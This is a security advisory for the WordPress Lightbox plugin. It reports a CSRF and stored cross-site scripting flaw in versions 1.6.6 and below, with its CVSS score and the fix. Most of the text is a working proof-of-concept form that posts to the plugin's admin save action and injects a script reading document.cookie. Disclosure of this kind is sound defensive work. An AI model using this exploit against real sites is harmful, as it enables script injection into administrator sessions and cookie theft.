Homepage

https://wordpress.org/plugins/lightbox/

Overview

Due to a lack of CSRF mitigation and entity encoding in the output generated by /admin/view/huge_it_light_box.php, it is possible to store and execute scripts in the context of an admin user.

CVSS Score

4.8

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)

Versions Affected

1.6.6 and below

Solution

Upgrade to version 1.6.8

WordPress Exploit Framework Module

exploits/lightbox_reflected_xss_shell_upload

Proof of Concept

<form action="http://[target]/wp-admin/admin.php?page=huge_it_light_box&amp;hugeit_task=save" method="post">
  <input type="text" name="light_box_speed" value="&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;">
  <input type="text" name="light_box_style" value="1" />
  <input type="text" name="light_box_transition" value="elastic" />
  <input type="text" name="light_box_fadeout" value="300" />
  <input type="text" name="light_box_title" value="false" />
  <input type="text" name="params[light_box_opacity]" value="20" />
  <input type="text" name="params[light_box_open]" value="false" />
  <input type="text" name="params[light_box_overlayclose]" value="false" />
  <input type="text" name="params[light_box_overlayclose]" value="true" />
  <input type="text" name="params[light_box_esckey]" value="false" />
  <input type="text" name="params[light_box_arrowkey]" value="false" />
  <input type="text" name="params[light_box_loop]" value="false" />
  <input type="text" name="params[light_box_loop]" value="true" />
  <input type="text" name="params[light_box_closebutton]" value="false" />
  <input type="text" name="params[light_box_closebutton]" value="true" />
  <input type="text" name="params[light_box_fixed]" value="false" />
  <input type="text" name="params[light_box_fixed]" value="true" />
  <input type="text" name="params[slider_title_position]" value="5" />
  <input type="text" name="params[light_box_size_fix]" value="false" />
  <input type="text" name="params[light_box_width]" value="500" />
  <input type="text" name="params[light_box_height]" value="500" />
  <input type="text" name="params[light_box_maxwidth]" value="768" />
  <input type="text" name="params[light_box_maxheight]" value="500" />
  <input type="text" name="params[light_box_initialwidth]" value="300" />
  <input type="text" name="params[light_box_initialheight]" value="100" />
  <input type="text" name="params[light_box_slideshow]" value="false" />
  <input type="text" name="params[light_box_slideshowspeed]" value="2500" />
  <input type="text" name="params[light_box_slideshowauto]" value="false" />
  <input type="text" name="params[light_box_slideshowauto]" value="true" />
  <input type="text" name="params[light_box_slideshowstart]" value="start slideshow" />
  <input type="text" name="params[light_box_slideshowstop]" value="stop slideshow" />
  <input type="text" name="params[watermarket_image]" value="false" />
  <input type="text" name="params[watermark_width]" value="0" />
  <input type="text" name="params[watermark_transparency]" value="0" />
  <input type="submit" value="submit">
</form>